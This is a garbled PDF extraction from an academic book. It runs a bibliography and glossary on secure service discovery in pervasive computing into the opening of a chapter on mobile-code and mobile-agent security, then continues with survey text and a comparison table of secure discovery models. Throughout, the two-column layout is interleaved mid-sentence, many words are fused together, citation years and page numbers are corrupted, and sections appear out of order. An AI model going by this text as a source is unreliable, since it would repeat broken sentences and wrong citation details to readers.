J., Takashio, K., & Tokuda, H. (2004). Improving

security for ubiquitous campus applications. In Sharmin, M., Ahmed, S., & Ahamed, S. (2006a).
Symposium on Applications and the Internet- MARKS (middleware adaptability for resource
Workshops (SAINT 2004) (pp. 417-422). discovery, knowledge usability, and self healing)
in pervasive computing environments. In Third
Microsoft Corporation. (2000). Universal plug and
International Conference on Information Technol-
play device architecture, Version 1.0.
ogy: New Generations (pp. 306-313).
Miller, B., Nixon, T., Tai, C., & Wood, M. (2001).
Sharmin, M., Ahmed, S., & Ahamed, S. (2006b). An
Home networking with universal plug and play.
adaptive lightweight trust reliant secure resource
IEEE Communications Magazine,(12), 93 104-
discovery for pervasive computing environments.
109.
In Proceedings of the fourth annual IEEE inter-
Minami, K., & Kotz, D. (2005). Secure context- national conference on pervasive computer and
sensitive authorization. In Proceedings of the Third communications (PerCom)026 (pp. 258-263).
International Conference on Pervasive Computing
Sharmin, M., Ahmed, S., & Ahamed, S. (2006c).
and Communications Workshops (PerCom) 502
SSRD+: A privacy-aware trust and security model
(pp. 257-268).
for resource discovery in pervasive computing
Nidd, M. (2001). Service discovery in DEAPspace. environment. In 30th Annual International Com-
IEEE Personal Communications, 8(4), 39-45. puter Software and Applications Conference
COMPSAC
( )026 (pp. 67-70).
Pearson, S. (2005). How trusted computers can
enhance privacy preserving mobile applications. Smith, B., Seamons, K., & Jones, M. (2004). Re-
In Proceedings of the Sixth International IEEE sponding to policies at runtime in TrustBuilder. In
Symposium on a World of Wireless Mobile and Fifth International Workshop on Policies for Dis-
Multimedia Networks (WoWMoM’0(pp. )5 609- tributed Systems and Networks (POLICY 2004).
613).
Stajano, F. (2002). Security for ubiquitous com-
Robinson, P., Vogt, H., & Wagealla, W. (Eds.). puting. West Sussex, England: John Wiley and
(2005). Privacy, security and trust within the con- Sons.
text of pervasive computing. Heidelberg, Germany:
Stajano, F., & Anderson, R. (2002). The resur-
Springer-Verlag.
recting duckling: Security issues for ubiquitous
Saha, S., Chaudhuri, K., Sanghi, D., & Bhagwat, computing. IEEE Computer, 5 3 (4), 22-26.
P. (2003). Location determination of a mobile de-
Sun Microsystems. (2001). Jini™ technology core
vice using IEEE 802.11b access point signals. In
platformspecification,version.2 1
IEEE Wireless Communications and Networking
Conference (WCNC) (pp. 1987-1992). Thomas, R., & Sandhu, R. (2004). Models, pro-
tocols, and architectures for secure pervasive
Satyanarayanan, M. (1996). Fundamental chal-
computing: challenges and research directions. In
lenges in mobile computing. In Fifteenth ACM
Second IEEE International Conference on Perva-
Symposium on Principles of Distributed Comput-
sive Computing and Communications—Workshops
ing (pp. 1-7).
(PerCom 2004) (pp. 164-168).
Seamons, K., Winslett, M., & Yu, T. (2001). Limit-
Tripathi, A., Ahmed, T., Kulkarni, D., Kumar,
ing the disclosure of access control policies dur-
R., & Kashiramka, K. (2004). Context-based
ing automated trust negotiation. In Network and
secure resource access in pervasive computing
Distributed System Security Symposium.
environments. In Second IEEE Annual Confer-
Shankar, N., & Arbaugh, W. (2002). On trust for ence on Pervasive Computing and Communica-
ubiquitous computing. Workshop on security in tions—Workshops. (p. 159).
ubiquitous computing (UBICOMP 2002).

Undercoffer, J., Perich, F., Cedilnik, A., Kagal, Zhu, F., Mutka, M., & Ni, L. (2003). Splendor:
L., & Joshi, A. (2003). A secure infrastructure A secure, private, and location-aware service
for service discovery and access in pervasive discovery protocol supporting mobile services.
computing. Mobile Networks and Applications, In Proceedings of the First IEEE Conference on
8(2), 113-125. Pervasive Computing and Communications (Per-
Com 2003) (pp. 235-242).
Want, R., & Pering, T. (2005). System challenges
for ubiquitous and pervasive computing. In Twenty- Zhu, F., Mutka, M., & Ni, L. (2004). PrudentExpo-
seventh International Conference on Software sure: A private and user-centric service discovery
Engineering(ICSE) 502 (pp. 9-14). protocol. In Proceedings of the Second IEEE
Conference on Pervasive Computing and Com-
Weiser,The M.. ) 1 9 1 ( computerforthetwenty-first
munications (PerCom 2004) (pp. 329-340).
century. ScientificAmerican, (3),5 62 94-104.
Zhu, F., Mutka, M., & Ni, L. (2005). Expose or
Weiser, M. (1993). Some computer science prob-
not?Aprogressiveexposureapproachforservice
lems in ubiquitous computing. Communications
discovery in pervasive computing environments.
of the ACM, 63 (7), 75-84.
In Proceedings of the Third IEEE Conference
Winoto, W., Schwartz, E., Balakrishnan, H., & on Pervasive Computing and Communications
Lilley, J. (1999). The design and implementation of (PerCom) 502 (pp. 225-234).
an intentional naming system. In 17th ACM Sym-
Zhu, F., Mutka, M., & Ni, L. (2006). A private, se-
posium on Operating Systems Principles (SOSP
cure, and user-centric information exposure model
’9)9 (pp. 186-201).
for service discovery protocols. IEEE Transactions
Winslett, M. (2003). An introduction to automated on Mobile Computing, 5 (4), 418-429.
trust establishment. First international conference
Zimmermann, P. (1995). PGP source code and
on trust management.
internals. Cambridge, MA: MIT Press.
Wu, C., Fu, L., & Lian, F. (2004). WLAN loca-
tion determination in e-home via support vector
classification. IEEEIn
Conference on Networking,
kEy tErMs
Sensing & Control (pp. 1026-1031).
Context: Context is the location, time, and
Youssef, M., Agrawala, A., & Udaya, A. (2003). activity state of the user when performing a service-
WLAN location determination via clustering and related operation such as discovery, advertisement,
probability distributions. In Proceedings of the or invocation.
First Annual IEEE International Conference on
Federated Discovery: Federated discovery
Pervasive Computer and Communications (Per-
is a service discovery mechanism that incorpo-
Com 2003) (pp. 143-150).
rates two or more different service advertisement
Yu, T., & Winslett, M..)A302 ( unified scheme mechanisms.
for resource protection in automated trust negotia-
Meta Discovery: Meta discovery is the dis-
tion. In IEEE Symposium on Security and Privacy
covery of a service discovery mechanism by using
(pp. 110-122).
meta information about that mechanism (Buford,
Zhu, F., Mutka, M., & Ni, L., (2002). Classifica - Brown et al., 2006).
tion of service discovery in pervasive computing
Peer Trust: Peer trust is the degree to which
environments (Tech. Rep. No. MSU-CSE-02-24).
a peer device is willing to disclose information or
East Lansing: Michigan State University.
provide access to resources to another peer, and

which may be determined by experience through and security policies of the devices participating
earlier interactions, verifiable properties of eachprocess.
in the service location
party, recommendations from trusted entities, and
Service Composition: Service composition is
reputation in a community.
the ability to dynamically discover and combine
Pervasive Computing: Pervasive computing component services to form new services.
is the evolution of distributed computing in which
Service Discovery: Service discovery occurs
networked computing devices are integrated
when device resources and functions are packaged
throughout the personal and work environments
as services, in a networked environment, and a
in a connected way, also referred to as ubiquitous
devicefindsanotherdevicecapableofofferinga
computing.
specificserviceorresource.
Secure Service Discovery: Secure service
discovery is service discovery that enforces privacy

Chapter III
Security of Mobile Code
Zbigniew Kotulski
Polish Academy of Sciences, Warsaw, Poland
Warsaw University of Technology, Poland
Aneta Zwierko
AbstrAct
The recent development in the mobile technology (mobile phones, middleware, wireless networks, etc.)
created a need for new methods of protecting the code transmitted through the network. The oldest
and the simplest mechanisms concentrate more on integrity of the code itself and on the detection of
unauthorized manipulation. The newer solutions not only secure the compiled program, but also the
data, that can be gathered during its “journey,” and even the execution state. Some other approaches
are based on prevention rather than detection. In this chapter we present a new idea of securing mobile
agents. The proposed method protects all components of an agent: the code, the data, and the execution
state. The proposal is based on a zero-knowledge proof system and a secure secret sharing scheme, two
powerful cryptographic primitives. Next, the chapter includes security analysis of the new method and
its comparison to other currently more widespread solutions. Finally, we propose a new direction of
securing mobile agents by straightening the methods of protecting integrity of the mobile code with risk
analysis and a reputation system that helps avoiding a high-risk behavior.
IntroductIon fortelecommunicationnetworksor - asartificiali

telligence (AI)-based intrusion detection systems.
A software agent is a program that can exercise Agents are commonly divided into two types:
an individual’s or organization’s authority, work
autonomously toward a goal, and meet and interact • Stationary agents
with other agents (Jansen & Karygiannis, 1999). • Mobile agents
Agents can interact with each other to negotiate
contracts and services, participate in auctions, or The stationary agent resides at a single platform
barter. Multi-agent systems have sophisticated ap- (host), the mobile one can move among different
plications, for example, as management systems platforms (hosts) at different times.
Copyright © 2008, IGI Global, distributing in print or electronic forms without written permission of IGI Global is prohibited.
The mobile agent systems offer new possibili- • Weakly mobile: Only the code is migrating;
ties for the e-commerce applications: creating new no execution state is sent along with an agent
types of electronic ventures from e-shops and e- program
auctions to virtual enterprises and e-marketplaces. • Strong mobile: A running program is mov-
Utilizing the agent system helps to automate many ing to another execution location (along with
e-commerce tasks. Beyond simple information its particular state)
gathering tasks, mobile agents can take over all
tasks of commercial transactions, namely, price The protection of the integrity of the mobile
negotiation, contract signing, and delivery of agent is the most crucial requirement for the agent
(electronic) goods and services. Such systems are system. The agent’s code and internal data autono-
developed for diverse business areas, for example, mously migrate between hosts and can be easily
contract negotiations, service brokering, stock changed during the transmission or at a malicious
trading, and many others (Corradi, Cremonini, host site. A malicious platform may make subtle
Montanari, & Stefanelli, 1999; Jansen & Karygi- changesintheexecutionow fl oftheagent’scode;
annis, 1999; Kulesza & Kotulski, 2003). Mobile thus, the changes in the computed results are dif-
agents can also be utilized in code-on-demand ficulttodetect.Theagentcannotitselfpreventt
applications (Wang, Guan, & Chan, 2002). Mobile but different countermeasures can be utilized in
agent systems have advantages even over grid order to detect any manipulation made by an un-
computing environments: authorized party. They can be integrated directly
into the agent system, or only into the design of an
• Require less network bandwidth agent to extend the capabilities of the underlying
• Increase asynchrony among clients and serv- agent system. However, the balance between the
ers security level and solution implementation’s cost,
• Dynamically update server interfaces as well as performance impact, has to be preserved.
• Introduce concurrency Sometimes, some restrictions of agent’s mobility
may be necessary.
The benefits from utilizing the mobileAccountability agents is also essential for the proper
in various business areas are great. However, this functioning of the agent system and establishing
technology brings some serious security risks; trust between the parties. Even an authenticated
one of the most important is the possibility of agent is still able to exhibit malicious behavior to the
tampering with an agent. In mobile agent systems platform if such a behavior cannot later be detected
the agent’s code and internal data autonomously and proved. Accountability is usually realized by
migrate between hosts and can be easily changed maintaining an audit log of security-relevant events.
during the transmission or at a malicious host site. Those logs must be protected from unauthorized
The agent cannot itself prevent this, but different accessandmodification.Alsothenon-repudiability
countermeasures can be utilized in order to detect of logs is a huge concern. An important factor of
any manipulation made by an unauthorized party. accountability is authentication. Agents must be
They can be integrated directly into the agent sys- able to authenticate to platforms and other agents
tem, or only into the design of an agent to extend and vice versa. An agent may require different
the capabilities of the underlying agent system. degrees of authentication depending on the level
Several degrees of agent’s mobility exist, cor- of sensitivity of the data.
responding to possibilities of relocating code and The accountability requirement needs also to
state information, including the values of instance be balanced with an agent’s need for privacy. The
variables, the program counter, execution stack, platform may be able to keep the agent’s identity
and so forth. The mobile agent technologies can secret from other agents and still maintain a form
be divided in to two groups: of revocable anonymity where it can determine
the agent’s identity if necessary and legal. The

security policies of agent platforms and their audit- method to provide such an environment is special
ing requirements must be carefully balanced with tamper-resistant hardware, but the cost of such a
agent’s privacy requirements. solution is usually very high.
Threats to security generally fall into three main The second group of methods provides the
classes: (1) disclosure of information, (2) denial of agents’ manager with tools to detect that the agent’s
service, and (3) corruption of information (Jansen, dataorcodehasbeenmodified,oranagentwitha
1999). Threats in agent system can be categorized mechanism that prevents a successful, unauthor-
with regard to agents and platform relations (e.g., ized manipulation. In this chapter we concentrate
agent attacking an agent, etc.). Another taxonomy on the “built-in” solutions because they enable
of attacks in agent system was proposed in Man an agent to stay mobile in the strong sense and,
and Wei (2001). The article describes two main moreover, provide the agent with mechanisms to
categories of attacks: purposeful and frivolous. detect or prevent tampering. Detection means that
The first kind is carefully planned and thedesigned
technique is aimed at discovering unauthorized
andcanbefurtherclassifiedbythenature ofattackofthecodeorthestateinformation
modification
(read or non-read) and number of attackers (solo or Prevention means that the technique is aimed at
collaborative). During the second kind of attacks, preventing changes of the code and the state infor-
the attacker may not know the effect of his/her mation in any way. To be effective, detection tech-
actions or gain an advantage. These attacks can niques are more likely than prevention techniques
be random or total. Another category of attacks is to depend on legal or other social framework. The
connected with traffic analysis (Kulesza, - Kotulbetween detection and prevention can
distinction
ski, & Kulesza, 2006) or called blocking attacks be sometimes arbitrary, since prevention often
(when a malicious platform refuses to migrate the involves detection (Jansen, 2000).
agent), as described by Shao and Zhou (2006). In
this chapter we will focus on the threats from an
agent’s perspective. bAckground
Among the mentioned threats, the most impor-
tant are connected with the agent platform since Many authors proposed methods for protecting
themostdifficulttoensureistheagent’s code/
integrity state
of the mobile code. The most interesting
integrity. There are two main concepts for protect- of them are presented in this section.
ing mobile agent’s integrity:
time limited black-box security and
• Providing trusted environment for agent’s obfuscated code
execution
• Detection or prevention of tampering These methods are based on a black-box approach.
The main idea of the black-box is to generate ex-
Thefirstgroupofmethodsismoreconcentrated ecutable code from a given agent’s specification
on the whole agent system than on an agent in that cannot be attacked by read (disclosure) or
particular. These seem to be easier to design and modificationattacks.Anagentisconsideredtobe
implement but, as presented in Oppliger (2000), black-box if at any time the agent code cannot be
mostly lead to some problems. The assumption that attacked in the previous sense, and if only its input
an agent works only with a group of trusted hosts and output can be observed by the attacker. Since
makes the agent less mobile than it was previously it is not possible to implement it today, the relax-
assumed. Also an agent may need different levels ation of this notion was introduced Hohl (1998): it
of trust (some information should be revealed to is not assumed that the black-box protection holds
host while in another situation it should be kept forever, but only for a certain known time. Accord-
secret). Sometimes, it is not clear in advance that ingtothisdefinition,anagenthasthetime-limite
the current host can be considered as trusted. A black-box property if for a certain known time it
0
cannot be attacked in the aforementioned sense. Encrypted functions

The time limited black-boxfulfillstwoblack-box
properties for this limited time: The encrypted functions (EF) method is one step
forward in implementing the perfect black-box
• Codeanddataoftheagentspecification - security.can
It has been proposed initially by Sander
not be read and Tschudin (1998). Since then other similar
• Codeanddataoftheagentspecification - solutionscan
were introduced (Alves-Foss, Harrison,
notbemodified & Lee, 2004; Burmester, Chrissikopoulos, &
Kotzanikolaou, 2000) and the method is believed
This scheme will not protect any data that is to be one of the canonical solutions for preserving
added later, although the currently existing vari- agent’s integrity (Jansen, 2000; Oppliger, 2000).
ables will be changeable. Thus, it cannot protect The goal of the EF, according to Jansen (2000),
the state of an agent, which can change between is to determine a method, which will enable the
different hosts or any data, which the agent gath- mobile code to safely compute cryptographic
ered. primitives, such as digital signature, even though
In order to achieve the black-box property, sev- the code is executed in non-trusted computing
eral conversion algorithms were proposed. They environments and operates autonomously without
are also called obfuscating or mess-up algorithms. interactions with the home platform. The approach
These algorithms generate a new agent out of an is to enable the agent platform to execute a program
original agent, which differs in code but produces assimilating an encrypted function without being
the same results. able to extract the original form. This approach
The code obfuscation methods make it more requires differentiation between a function and a
complicated to obtain the meaning from the code. program that implements the function.
To change a program code into a less easy “read- The EF system is described as follows by
able” form, they have to work in an automatic Oppliger (2000):
and parametric manner. The additional param-
eters should make possible that the same original A has an algorithm to compute function f. B has
program is transformed into different obfuscated an input x and is willing to compute f(x) for A,
programs.Thedifficultyistotransform - the
but pro B to learn nothing substantial about
A wants
gram in a way that the original (or a similar, easily f. Moreover, B should not need interacting with A
understandable) program cannot be re-engineered during the computation of f(x).
automatically. Another problem is that it is quite
difficulttomeasurethequalityofobfuscation, The functionasf can be, for example, a signature
this not only depends on the used algorithm, but algorithm with an embedded key or an encryption
on the ability of the re-engineering as well. Some algorithm containing the one. This would enable
practical methods of code obfuscation are described the agent to sign or encrypt data at the host without
by Low (1998) and general taxonomy proposed by revealing its secret key.
Coilberg, Thomborson, and Low (1997). Although the idea is straightforward, it is hard
Since an agent can become invalid before tofindtheappropriateencryptionschemesthatca
completing its computation, the obfuscated code transform arbitrary functions as shown. So far,
is suitable for applications that do not convey the techniques to encrypt rationale functions and
information intended for long-lived concealment. polynomials have been proposed. Also a solution
Also, it is still possible for an attacker to read and based on the RSA cryptosystem was described
manipulate data and code but, as a role of these (Burmester et al, 2000).
elements cannot be determined, the results of this
attack are random and have no meaning for the
attacker.

mobile devices, but also for sharing of resources content sharing, communication, and gam-
between devices. There are four elements found ing.
in the service-oriented approach: (1) service de-
scription, which provides an interchangeable way Due to these trends, richer models of discovery
for devices to describe the service and its use; (2) are being considered such as federated discovery,
service registration or advertisement on behalf of meta discovery, and semantic discovery (Buford,
the service provider; (3) service discovery by de- Brown, & Kolberg, 2006; Buford, Celebi, &
vices seeking a service; and (4) service invocation, Frankl, 2006).
which is a protocol by which a service requester Consequently, it is important for wireless de-
and service provider coordinate to deliver a service. vices to securely participate in service discovery
Propagation of service advertisements can be using with other devices that are outside the immediate
pull (query), push (announcement), or a combina- administrative security domain. Further, these
tion of pull and push. In addition, the ability to devices interact with other devices in an ad hoc
dynamically discover and combine component
services to form new services is referred to as leads to the dependency on other devices for re-
service composition. sources. The nature of devices, communication
Broadband wireless technologies such as patterns, and dependency on other devices in turn
WiMax, UWB, and 802.11n are bringing broad- causes security vulnerabilities. Due to the ad hoc
band connectivity to mobile CE devices. These connectivity and dynamic nature of the population
devices will be able to switch between different -
network access technologies. This has the following mittent and short-lived. Moreover, multiple devices
consequences for service discovery in pervasive
computing:
responsive service discovery model.
• Due to broadband connectivity, devices Thus far, we have discussed the general view
will be able to participate in media-rich and of and motivation for service discovery for mobile
sophisticated resource sharing. devices. The rest of the chapter is organized as
• Wide-area service discovery and location- follows: The next section summarizes the security
based discovery will grow in importance due goals for service discovery and presents a model
to the combination of increased connectivity for service discovery in pervasive computing. The
and wide-area roaming. third section surveys present unsecured service
• The ability to act as multi-homed devices discovery models. The fourth section surveys ex-
means that devices will have increased isting secure service discovery models, organized
connectivity but also an increased rate of into three different categories. Two case studies
transitions due to roaming between different of service discovery protocols that incorporate
networks. trust-based mechanisms are described in the
• Devices will be able to simultaneously par-
ticipate in a personal area network (PAN), sections summarize important research issues and
home networks, and wireless area networks conclusions.
(WANs) with different security and trust
properties. In PANs and home networks,
mediation of service discovery between
networks is needed, in which devices such
as gateways proxy or intermediate service -
discovery between network domains. covery is well established (Matsumiya et al., 2004;
• Device-to-device interaction will grow in Stajano, 2002; Stajano & Anderson, 2002). Privacy,
importance to users for applications such as security, and trust issues in service discovery in the
pervasive computing area are of utmost importance crossing administrative boundaries, or without
(Robinson et al., 2005). Thus, the service discovery infrastructure support, other mechanisms are
process demands models that ensure the privacy needed.
and security of the user. In particular, this privacy Further, traditional security mechanisms do
and security should encompass: not work well in this environment because the
devices are computationally limited and the no-
• Authentication: Does the user and device tion of physical security is not applicable (Kagal,
actuallyhavetheindicatedidentity? Finin, & Joshi, 2001). Then, considering the choices
• Authorization: Does the user have access of totally sacrificing security versus imposing a
rights for issuing service advertisements, full-edged
fl securitystructuresimilartodeskt
requestingservices,andinvoking andservices?
laptops, the question is whether there is any
• Trust: Are the participating user and device middle ground. Ensuring varying levels of security
trusted?Aretheserviceanditsfor components
various services is a research challenge. The
trusted? insufficiency of user/device identity for trust is
• Privacy: Is only the approved information another concern in designing a discovery model,
shared between the given users/devices dur- and techniques for peer trust and risk assessment
ing service discovery, advertisement and (Chen, Jensen, Gray, Cahill, & Seigneur, 2003)
invocationSDAI) ( operations?Isdisclosure are important tools to address this.
tounauthorizedusersprevented?Desired characteristics of a secure and private
• Vulnerability to attack and misuse: Are service discovery model are summarized next.
the SDAI operations protected from attacks
such as denial-of-service, spoofing, replay, • Adaptive: The trust value and security level
andman-in-the-middle?AretheSDAI-opera should be adaptable depending on the service
tions protected from misuse in enabling such itself, the service provider, and the service
attacksonothernetworkcomponents? requester.
• Trust reliant: The model should consider
An important question is what security, privacy, trust relationships among devices. Where
and trust mechanisms are provided by the wireless no prior information is available, reputa-
network. IEEE 802.11i, also known as WiFi Pro- tion, recommendation, or trust negotiation
tected Access 2 (WPA2), replaced Wired Equiva- schemes can be used. If these are unsuitable,
lent Privacy (WEP) with stronger encryption and then risk assessment can be used.
a new authentication mechanism incorporating an • Infrastructure independence: No infra-
authentication server such as remote authentication structure support (e.g., powerful servers,
dial in user service (RADIUS). This mechanism proxies) should be required. Then the model
while suitable for enterprise deployment has had should work independently without any
limited use in home networks because of complex external support, but be able to leverage
administration and in public hot spots due to dif- infrastructure where it exists.
ficultyadministeringsharedkeys.Thus,•inthe best
Lightweight: The model should be light-
case, a set of devices are authenticated in a single weightintermsofexecutablefilesize.
administrative domain, and the authentication • Service oriented: To control service security
server can be used to support authorization poli- modularly, service discovery models should
cies including policies related to service discovery be service oriented.
and use. Network packets between authenticated • Graceful performance degradation: The
users are encrypted, providing communication model should not put much overhead on the
privacy from non-authenticated parties. However, performance of the device, and performance
these security capabilities cover only a subset of should degrade gracefully for more advanced
the aforementioned security goals and are limited security features.
to single administrative domains. For interactions

• Energy efficient: Service discovery models of local services. After receiving a broadcast, each
should be energy conserving, for example, node updates its service list with information about
avoiding continuous broadcasting or polling. the other nodes’ services. This service information
is included in that node’s subsequent broadcast.
Aclassificationanddetailedsurvey Eachofservice
node is a broadcaster and DEAPSpace uses
discovery models can be found in Zhu, Mutka, and contention timers at each node so that a node will
Ni (2002). Service-oriented architectures (SOA) randomly delay its broadcast after another broad-
and their security are discussed in Cotroneo, cast is received. DEAPSpace can reduce service
Graziano, and Russo (2004). We classify existing discovery time at the cost of increased bandwidth
service discovery models into two broad categories. and power consumption.
First are service discovery models that do not ad- INS (Winoto et al., 1999) supports both pull
dress security issues (Balazinska, Balakrishnan, and push delivery of service advertisements. It also
& Karger, 2002; Microsoft, 2000; Miller, Nixon, supports unicast, anycast, and broadcast methods.
Tai, & Wood, 2001; Nidd, 2001; Winoto, Schwartz, It offers the best-match resource information and
Balakrishnan, & Lilley, 1999). Second, there also provides facilities for limited support of
are models that consider a full-edged fl security
context information. In INS each device requests
mechanism with the help of infrastructure sup- a central name resolver for the type of services
port (Czerwinski, Zhao, Hodes, Joseph, & Katz, it requires, and the resolver replies with the best
1999; Zhu, Mutka, & Ni, 2003, 2004). The next matched device address.
two sections discuss examples of these cases, and
Table 1 compares the key features of the surveyed secure service discovery Models
systems.
Most contemporary service discovery models
fall into this category. There are some models
sErvIcE dIscovEry ModEls that include full-edged fl security mechanisms,
wItHout InHErEnt sEcurIty while others rely on simple algorithms for limited
security. This category can be subdivided into
We describe several designs that do not address infrastructure based, infrastructureless, hardware
security requirements. Nevertheless these mod- based, and smart-space-oriented security mecha-
els are important either because the systems are nisms. In the following subsections we discuss
widely used, are representative approaches, or each of these categories.
could be secured by additional mechanisms in
a secure network. The designs we discuss are Infrastructure-based security
Bluetooth, DEAPSpace, and Intentional Naming
System (INS). UPnP is a specification for connecting multiple
Bluetooth (Bluetooth Special Interest Group devices on a home network so that these devices
[SIG], 2001a, 2001b) is a pull protocol. Device caninvokeservicesofeachother.UPnPdefinesa
information, services, and the characteristics of set of protocols and a service description format.
the services are queried and connections between In addition, UPnP standardizes various service
two or more Bluetooth devices are established. interfaces. UPnP relies on administratively scoped
This facilitates user selection, scope-awareness, multicast IP address for service discovery, service
and both unicast and broadcast communication. advertisement, and event delivery. Each UPnP
A Bluetooth device returns all matched resource devicebroadcastsitsadvertisementswhenit
information. connects to the network. Thereafter, a UPnP device
Nidd (2001) developed the DEAPSpace service broadcasts advertisements in response to queries
discovery method for ad hoc and mobile device ap- from other devices. These queries may be for all
plications. Each node broadcasts its advertisement services on the network or a specific service on

TableComparison
1. ofsecureservicediscoverymodels(SSDS)SSDS : (Czerwinskietal.Ninja
19),
(Goldberg,Gribble,Wagner,Brewer, & Gribble
19; etal.UPnP
201), (Milleretal.SPDP 201),
(AlmenarezCampo, & Progressive
203), Exposure(Zhuetal.Zhu, 204; , Mutka,Ni,
& Splendor
206),
(Kagal, Korolev, Chen, Joshi, & Finin, 2001), Jini (Sun Microsystems, 2001), CSAS (Minami & Kotz,
CSM
205), (BrezillonMostefaoui,
& AVCM
204), (ShankarArbaugh,
& CSRA 20), (Tripathi,Ahmed,
Kulkarni,Kumar,&Kashiramka,204),TRAC(Basu&Callaghan,205),SME(Kopp,Lucke,&Ta -
vangarian,HCA 205), (Pearson,SSRD205), (Sharmin,Ahmed,Ahamed,
& 206a)SSRD+
, (Sharmin,
Ahmed, & Ahamed, 206b), Centaurus2 (Undercoffer, Perich, Cedilnik, Kagal, & Joshi, 203), SLP
(Barbeau,19;Guttman,Perkins,Veizades,&Day,19),Sleeper(Buford,Celebi,etal.,206)
Infrastructure smart
service- trust Privacy context
Model Adaptive support lightweight space
oriented Aware Aware Aware
needed needed
SSDS No Yes No No N/A N/A N/A No
Ninja No Yes No No N/A N/A N/A No
UPnP No N/A No No No Yes No Limited
SPDP No No Yes No Yes N/A No No
Progressive
No Yes No No No Yes Limited No
Exposure
Splendor No Yes No No Yes Yes N/A No
Jini No N/A No No N/A Yes N/A Limited
CSAS No No Yes No N/A N/A Yes No
CSM Yes No Yes No N/A N/A Yes No
AVCM Limited No Yes No Yes Yes Yes No
CSRA No Yes No No N/A N/A Yes Yes
TRAC No N/A No No Yes Yes N/A Yes
SME Yes N/A N/A Yes N/A Yes No N/A
HCA No N/A Yes No No Yes No N/A
SSRD Yes No Yes Yes Yes Yes Limited No
SSRD+ Yes No Yes Yes Yes Limited Yes No
Centaurus Yes Yes No No No N/A Yes No
SLP No Yes Yes Yes No No No No
Sleeper Yes No Yes Yes Yes Yes No No
thenetwork.UPnPDeviceSecurityspecification heterogeneous network domains. The system uses a

definessecuritymechanismsforsimple - object
local ac
certificate authorityCA) ( andeachentitymus
cess protocol (SOAP)-based service invocation, but be pre-registered in the system. The CA issues a
does not address simple service discovery protocol certificatetoeachidentifiedandverifiedentity.T
(SSDP) security. design of Centaurus2 includes four components,
As an extension of project Centaurus (Kagal, and each component has a separate private key
Korolev, Avancha, et al., 2001; Kagal, Korolev, which is stored at the client using PKCS #11:
Chen, et al., 2001), Centaurus2 (Undercoffer et al.,
2003) provides a secure mechanism for service dis- 1. The local CA is responsible for issuing digital
covery and enables users to access services across certificates and for validating these digit
certificates.

2. The communication manager mediates com- access or denial respectively. This approach fa-
munication between clients and networked cilitatesconfidentiality,integrity,andscalab
services. To authorize access, CSAS uses previously stored
3. Group membership(s) is maintained and information,whichmaybedifficulttocollectfor
stored by the capability manager. users in an ad hoc network.
.4 Eachclientisregisteredtoaspecificservice Splendor (Zhu et al., 2003) is a secure, private,
manager that ensures security, access rights, and location-aware service discovery protocol.
and mediates between user client and service Splendor adapts depending on the network en-
client. Service managers maintain a service vironment to use either a client-service model or
registry. client-service-directory model. Proxies are used to
offloadworkloadformobileservices.-Mobileser
Each domain has a root service manager. Static vices authenticate with proxies and proxies handle
bridgesareconfiguredbetweenservice managers
registration. In these situations, proxies are consid-
in different domains. Then clients in separate do- ered to be trusted servers. However, if no trusted
mains can access services across domains using server is available in an environment, then there
the root service manager as the context. is no agent to handle the registration. Its security
In SSDS (Czerwinski et al., 1999), both service model is based on mutual authentication.
advertisement pull (query) and push (announce- Progressive Exposure (Zhu et al., 2004, 2006)
ment) are supported. Service advertisements are is a secure service discovery approach. It ad-
stored in a hierarchy of servers. SSDS provides dresses privacy issues using a mutual matching
capability-based access control. All information technique. Progressive exposure addresses security
passed between clients and servers is encrypted. and fairness by not exposing too much informa-
A single copy of the resource information is stored tion. In each round of message exchange between
and accessed, which makes the system vulner- communicating parties, it tries to find whether
able to single point failure. Subsequently, the any mismatch occurs. In case of a mismatch, the
Ninja project (Goldberg et al., 1999; Gribble et al., communication stops. It uses one-time code words
) 1added
02 the concept of secure identification and a hash-based message authentication code. It
of service through SSDS. In Ninja, the CA issues considers the presence of one user and one service
valid certificates and the capability - manager
provider, au not address situations in which
but it does
thorizes user access to a particular resource. The many users and many service providers are present.
service providers can also prescribe the conditions When a service provider leaves the network, the
(capabilities) that are needed by a user in order to process of provider lookup and the authentication
discover a particular service. phase is restarted. It provides privacy for service
The context-sensitive authorization scheme information, requests, domain identity, and user
(CSAS) (Minami & Kotz, 2005) provides authoriza- credentials, and is based on the client-service-
tion without a central server or CA. When a CSAS directory model.
user wants to access a service from a resource,
the associated server issues a logical authentica- Infrastructure-less security
tion query and sends it to the host of the resource.
Each host has a knowledge domain with which it SPDP (Almenarez & Campo, 2003) is a secure
attempts to prove the authorization query. If it fails, service discovery protocol based on the PTM
it distributes several portions of the proof to multiple (Almenarez, Marin, Campo, & Garcia, 2004; Al-
hosts. Through this distribution CSAS reduces the menarez, Marin, Dyaz, & Sanchez, 2006) model.
computational overhead on any single node. After The need for a centralized server is avoided by
collecting the sub-proofs from the other hosts, the having each device act as its own CA. For a service
host of the resource can declare the result of the request, this model uses broadcast messaging. The
query to be true or false, thus indicating grant of requesting device updates its cache after getting a

reply from the devices (if any reply). It then stores language (WSDL) and resource description frame-
the device identities that it believes trustworthy. work (RDF) conditions for security, and policies for
The devices’ user agents continually listen for thebindingprotocol.Thebindingprotocolspecifies
messages, which in turn means continual energy whether the binding of a resource is “shared” or
consumption. “private,” and whether the binding is “permanent”
Narendar Sarkar et al. (Shankar & Arbaugh, or “context-based.”
2002) propose an attribute vector calculus (AVCM) Basu and Callaghan (2005) present a TRAC
for modeling trust. Their model describes both for increasing security and user confidence in
identity-based trust and context-based trust and is pervasive computing systems. They use trust and
oneofthefirstmodelsthatdiscussesthe importance
role-based access control for ensuring security and
of trust in a ubiquitous environment. Brezillion privacy. However their model is aimed at an intel-
and Mostefaoui (2004) present a context-based ligent environment (IE) only. This policy-based
security model (CSM) and they discuss the need for modelallowsuserstodefinepoliciesforthemselve
adaptive security based on the particular situation. and thus gives users control to define their own
Thomas and Sandhu (2004) present the challenges security level. This model works in an IE because
and research issues for secure pervasive computing. every user is known beforehand. However, in a
They express the need for a dynamic trust model truly pervasive environment it is not possible to
as the pervasive computing environment poses have prior information about every user and thus,
new kinds of security challenges due to its diverse this model is not applicable.
nature. They present a socio-technical view.
smart space dependent security ExAMPlEs usIng trust ModEls
A smart space provides devices with complex com- We next describe two service discovery protocols,
putational support that supports context-awareness Sleeper and SSRD, which incorporate trust models
and collaboration. Components of the smart space for infrastructure-less security.
canoffloadsecurediscoverytasksandrelatethem
to other activities in the space. Examples include sleeper
context-based secure resource access (CSRA)
